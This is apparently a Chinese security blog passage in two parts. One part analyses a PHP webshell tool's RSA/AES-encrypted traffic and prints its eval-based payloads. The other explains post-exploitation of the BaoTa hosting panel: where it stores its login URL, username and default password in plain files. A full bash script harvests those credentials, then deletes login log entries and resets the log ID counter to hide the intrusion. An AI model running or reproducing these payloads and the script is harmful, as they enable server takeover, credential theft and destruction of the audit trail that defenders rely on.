if (!isset($_SESSION['replay_key_8b0c50f8-564e-4313-b6a8-97731b4a9e06'])) {
decoder_echo("WRONG_NO_SESSION");
} else if (9743 == $_SESSION['replay_key_8b0c50f8-564e-4313-b6a8-97731b4a9e06']) {
eval(base64_decode('ZGVjb2Rlcl9lY2hvKCdwcWFhcXonIC4gJ2h0ZmlraycpOw=='));
unset($_SESSION['replay_key_8b0c50f8-564e-4313-b6a8-97731b4a9e06']);
} else {
decoder_echo("WRONG_BAD_9743");
}
} catch (Exception $e) {
die("POSTEXEC_F" . "AILED");
}
echo 'mgsoyb';

加密流量

客户端首先将RSA的公钥传递至服务端,服务端通过执行php代码生成AES的密钥,通过RSA加密将AES密钥发送至客户端

最后流量通过AES加密传输

image-20241126163309312

image-20241126164029098

get_rsa_key生成RSA的公钥和私钥

image-20241126164434581

通过get_aes_key使用ENCRYPTION_SENDKEY_PHP代码模板创建一个payload,通过submitter发送过去,如果回来正确的数据就用rsa解密读取AES密钥

image-20241126164528430

ENCRYPTION_SENDKEY_PHP = compress_phpcode_template(
"""
if(!extension_loaded('openssl')){
decoder_echo("WRONG_NO_OPENSSL");
}else if(!function_exists("openssl_public_encrypt")){
decoder_echo("WRONG_NO_OPENSSL_FUNCTION");
}else{
$_SESSION[{session_name}] = openssl_random_pseudo_bytes(32);
openssl_public_encrypt(
$_SESSION[{session_name}],
$encrypted,
base64_decode({pubkey_b64}),
OPENSSL_PKCS1_OAEP_PADDING
);
decoder_echo(base64_encode($encrypted));
}
"""
)
<?php
session_start();
function decoder_echo_raw($s)
{
echo $s;
}
$eg_decoder_hooks = array();
function decoder_echo($s)
{
global $eg_decoder_hooks;
for ($i = 0; $i < count($eg_decoder_hooks); $i++) {
$f = $eg_decoder_hooks[$i];
$s = $f($s);
}
echo decoder_echo_raw($s);
}
echo 'qfy' . 'ebe';
try {
if (!extension_loaded('openssl')) {
decoder_echo("WRONG_NO_OPENSSL");
} else if (!function_exists("openssl_public_encrypt")) {
decoder_echo("WRONG_NO_OPENSSL_FUNCTION");
} else {
$_SESSION['_566d3bb0-51e1-4077-94c2-dc4d8e4294e5'] = openssl_random_pseudo_bytes(32);
openssl_public_encrypt($_SESSION['_566d3bb0-51e1-4077-94c2-dc4d8e4294e5'], $encrypted, base64_decode('LS0tLS1CRUdJTiBQVUJMSUMgS0VZLS0tLS0KTUlJQklqQU5CZ2txaGtpRzl3MEJBUUVGQUFPQ0FROEFNSUlCQ2dLQ0FRRUFzS0ZnMk5iUHpoblRYQ2c2R0kwMgoxZklhWUsvRDV4cHVzQTlJbEI4NUt5ZUhiTVVxaXNjTFQ1UDRudVE2dU9qWjY2WEljKzlGd1lrUXJjaVhDS25BCkNpV3lZUFZnNFFvWGtFNkJJbGlKZWhaRU0xeVhTdGQ0UitLZzRiWlFGWXpQR0tpWm5KK3NtYUNiRmU3dnZsd24KVUFLU2ZCUkVtb1lyekFzd2oreGV6blFXL04yOVQ4bXpYUGdjbFV2UG9MMllydzdSeDlvbUtyZU8ydUNRUnpoawo2RG5PWElhb0NUUURxbU5PaXdlb0Faa0hCR0VVbHJxaFdMd3AweEx2ajBsRUliRGpId295cFJkejhlclRzMnlZClhESmF5ZXJCNUdXTmZqdEJEYzJBMHRkeXBHaFBIeGFaelF5VEUwTTIvbHdZR0txU29LaXNuTnNWM1VCQmw2Q1UKQ1FJREFRQUIKLS0tLS1FTkQgUFVCTElDIEtFWS0tLS0t'), OPENSSL_PKCS1_OAEP_PADDING);
decoder_echo(base64_encode($encrypted));
}
} catch (Exception $e) {
die("POSTEXEC_F" . "AILED");
}
echo 'rqrrrp';

收到回显的密钥后通过encrypt_aes256_cbc加密payload,通过ENCRYPTION_COMMUNICATE_PHP模板生成最后的payload,发送至服务端

image-20241127143515572

ENCRYPTION_COMMUNICATE_PHP = compress_phpcode_template(
"""
function aes_enc($data) {
$iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length('AES-256-CBC'));
$encryptedData = openssl_encrypt(
$data,
'AES-256-CBC',
$_SESSION[{session_name}],
0,
$iv
);
return base64_encode($iv . base64_decode($encryptedData));
}

function aes_dec($encryptedData) {
$data = base64_decode($encryptedData);
return openssl_decrypt(
base64_encode(substr($data, 16)),
'AES-256-CBC',
$_SESSION[{session_name}],
0,
substr($data, 0, 16)
);
}
if(!isset($_SESSION[{session_name}])){
decoder_echo("WRONG_NO_SESSION");
}else if(extension_loaded('openssl')) {
array_push($eg_decoder_hooks, "aes_enc");
$code = aes_dec({code_enc});
eval($code);
}else{
decoder_echo("WRONG_NO_OPENSSL");
}
"""
)
<?php
session_start();
function decoder_echo_raw($s)
{
echo $s;
}
$eg_decoder_hooks = array();
function decoder_echo($s)
{
global $eg_decoder_hooks;
for ($i = 0; $i < count($eg_decoder_hooks); $i++) {
$f = $eg_decoder_hooks[$i];
$s = $f($s);
}
echo decoder_echo_raw($s);
}
echo 'yiw' . 'nun';
try {
function aes_enc($data)
{
$iv = openssl_random_pseudo_bytes(openssl_cipher_iv_length('AES-256-CBC'));
$encryptedData = openssl_encrypt($data, 'AES-256-CBC', $_SESSION['_609cc29a-28e5-4de7-8c56-ccfcf1cc48a1'], 0, $iv);
return base64_encode($iv . base64_decode($encryptedData));
}
function aes_dec($encryptedData)
{
$data = base64_decode($encryptedData);
return openssl_decrypt(base64_encode(substr($data, 16)), 'AES-256-CBC', $_SESSION['_609cc29a-28e5-4de7-8c56-ccfcf1cc48a1'], 0, substr($data, 0, 16));
}
if (!isset($_SESSION['_609cc29a-28e5-4de7-8c56-ccfcf1cc48a1'])) {
decoder_echo("WRONG_NO_SESSION");
} else if (extension_loaded('openssl')) {
array_push($eg_decoder_hooks, "aes_enc");
$code = aes_dec('YPE+ioDoxcvCjgdpLho7/cJtmXRSXq9VKmfDybcmhwAkvmuCukxqWMV0GVv+1scfIMmuj6aX6Dlq9Tk9On0VJ8Q7md5QAIGmmrPlAMRg1mNuQta7+paSwSelVJPNsA4h');
eval($code);
} else {
decoder_echo("WRONG_NO_OPENSSL");
}
} catch (Exception $e) {
die("POSTEXEC_F" . "AILED");
}
echo 'dgydmh';

宝塔面板

基础信息

如果发现一个网站是由宝塔面板搭建,并且获取了这个网站的shell,但是只有www权限,还有disable_functions阻拦使用命令函数,那么可以尝试获取宝塔的登录url、默认账号、默认密码,尝试进行登录。

windows7.9.0版本

我使用windows10搭建了宝塔面板(windows7.9.0版本),我们可以看到它的登录接口,默认账号,默认密码

image-20231204105521895

但是它是以明文的方式存储在/BtSoft/panel/data/目录下的文件中

image-20231204110428564

登录端口在port.pl文件中

image-20231204112928007

登录接口在admin_path.pl文件中

image-20231204110504732

默认账号在session文件夹下的文件中

image-20231204111158943

默认密码在default.pl文件中

image-20231204110658179

后续版本更新default.pl文件中为*乱码

源码的登录逻辑代码userlogin.py中发现登录成功后会更新default.pl文件

image-20240930115132487

Linux版本在7.9.5更新逻辑

image-20241008085641184

windows8.2.0默认密码仍在default.pl文件中(linux7.7.0符合,linux7.9.5修改代码逻辑,登录成功之后就会覆盖default.pl文件)

image-20241008093146195

日志计数

登录成功或错误会记录日志

image-20250114165653655

日志记录在/www/server/panel/data/default.db

image-20250114165826227

Script

读取接口url,获取用户名,密码,清除日志

linux

#!/bin/bash
# 定义文件路径
port_file="/www/server/panel/data/port.pl"
admin_path_file="/www/server/panel/data/admin_path.pl"
password_file="/www/server/panel/default.pl"
root_dir="/www/server/panel/"

local_ip=$(hostname -I | awk '{print $1}')
if [[ -f "$port_file" ]]; then
panel_port=$(cat "$port_file")
else
echo "文件 $port_file 不存在,无法读取端口。"
exit 1
fi
if [[ -f "$admin_path_file" ]]; then
admin_path=$(cat "$admin_path_file")
else
echo "文件 $admin_path_file 不存在,无法读取接口。"
exit 1
fi

# 输出接口 URL
if [[ -n "$local_ip" && -n "$panel_port" && -n "$admin_path" ]]; then
echo "---------------------------------------"
echo "接口 URL:"
echo "$local_ip:$panel_port$admin_path"
echo "---------------------------------------"
else
echo "无法生成接口 URL,请检查配置文件。"
fi

# 输出username
if [[ -d "$root_dir" ]]; then
db_files=$(find "$root_dir" -type f -name "default.db")
if [[ -n "$db_files" ]]; then
while IFS= read -r db_file; do
table_check=$(sqlite3 "$db_file" "SELECT name FROM sqlite_master WHERE type='table' AND name='users';")
if [[ -n "$table_check" ]]; then
echo "---------------------------------------"
sqlite3 "$db_file" "SELECT username FROM users;" | while read -r username; do
echo "username:$username"
done
else
echo "表 'users' 不存在。"
fi
done <<< "$db_files"
else
echo "未找到 default.db 文件。"
fi
else
echo "目录 $root_dir 不存在。"
fi

# 检查密码文件
if [[ -f "$password_file" ]]; then
pwd=$(cat "$password_file") # 读取密码内容
echo "password:$pwd"
echo "---------------------------------------"
else
echo "文件 $password_file 不存在。"
fi

# 查询并提示用户删除logs表的数据
echo "---------------------------------------"
echo "查询 logs 表数据并删除:"
if [[ -d "$root_dir" ]]; then
db_files=$(find "$root_dir" -type f -name "default.db")
if [[ -n "$db_files" ]]; then
# 展示日志数据
for db_file in $db_files; do
table_check=$(sqlite3 "$db_file" "SELECT name FROM sqlite_master WHERE type='table' AND name='logs';")
if [[ -n "$table_check" ]]; then
echo "日志条数:"
log_count=$(sqlite3 "$db_file" "SELECT COUNT(*) FROM logs;")
echo "日志表当前共有 $log_count 条数据。"
if [[ "$log_count" -gt 0 ]]; then
# 展示 logs 表的最后 10 条记录
echo "---------------------------------------"
echo "logs 表的最后 10 条记录:"
sqlite3 "$db_file" "SELECT * FROM logs ORDER BY id DESC LIMIT 10;"
echo "---------------------------------------"
else
echo "日志表中没有数据。"
fi
else
echo "表 'logs' 不存在。"
fi
done
# 提示用户输入要删除的日志条数
echo "请输入要删除的日志条数(按 ID 从大到小删除,输入 0 取消):"
read -r delete_count
# 调试输出,检查用户输入的数据
echo "用户输入的删除条数:$delete_count"
# 处理用户输入的删除条数
if [[ -n "$delete_count" && "$delete_count" =~ ^[0-9]+$ ]] && [[ "$delete_count" -gt 0 ]]; then
for db_file in $db_files; do
# 获取要删除的记录的 ID(按 ID 从大到小)
ids_to_delete=$(sqlite3 "$db_file" "SELECT id FROM logs ORDER BY id DESC LIMIT $delete_count;")
# 删除日志表中这些 ID 的记录
for id in $ids_to_delete; do
sqlite3 "$db_file" "DELETE FROM logs WHERE id = $id;"
done
# 获取删除后的最后一个ID
last_id=$(sqlite3 "$db_file" "SELECT MAX(id) FROM logs;")
# 如果 last_id 为空,表示表中没有数据,重置为1
if [[ -z "$last_id" ]]; then
last_id=1
fi
# 更新sqlite_sequence表的logs自增ID,确保ID自增正常
sqlite3 "$db_file" "UPDATE sqlite_sequence SET seq = $last_id WHERE name = 'logs';"
echo "已删除日志记录并更新了sqlite_sequence表。"
done
else
echo "无效的输入或删除数量超出范围,删除操作已取消。请输入有效的数字,且在 1 到 $log_count 的范围内。"
fi
else
echo "未找到 default.db 文件。"
fi
else
echo "目录 $root_dir 不存在。"
fi
echo "---------------------------------------"